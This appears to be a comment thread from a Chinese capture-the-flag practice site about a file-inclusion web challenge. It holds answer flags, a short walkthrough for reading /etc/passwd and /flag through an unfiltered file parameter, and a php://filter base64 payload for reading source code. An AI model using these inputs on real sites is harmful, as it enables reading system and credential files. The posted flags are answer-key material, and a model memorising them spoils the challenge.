flag{e92c0ec08be5fc7e0bd706e697e366fd}
flag{ebfea7aca0bd16bb5819c678090ff026}
打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag
file=/flag
flag{a1ad1a8522261e6b9abf21e9bd6ef675}
flag{b23328bbf165641292d9871be279459a}
flag{a15320afe0f7ad00fb16135d7456a9e1}
flag{4911bd2afb90b2abf40a02b45e6979ac}
flag{a48aed21035fc48b5003c3f615fad2b0}
http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
...
评论
nicchanggh 1年前
举报
flag{e92c0ec08be5fc7e0bd706e697e366fd}
chushou 1年前
举报
flag{ebfea7aca0bd16bb5819c678090ff026}
107zsm 1年前
举报
打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag
小夫 1年前
举报
file=/flag
rightstar 1年前
举报
flag{a1ad1a8522261e6b9abf21e9bd6ef675}
sibeil 1年前
举报
flag{b23328bbf165641292d9871be279459a}
wxy1343 1年前
举报
flag{a15320afe0f7ad00fb16135d7456a9e1}
mircle 1年前
举报
flag{4911bd2afb90b2abf40a02b45e6979ac}
xclay 1年前
举报
flag{a48aed21035fc48b5003c3f615fad2b0}
tardigrade 1年前
举报
http://xxxx/index.php?file=php://filter/read=convert.base64-encode/resource=index.php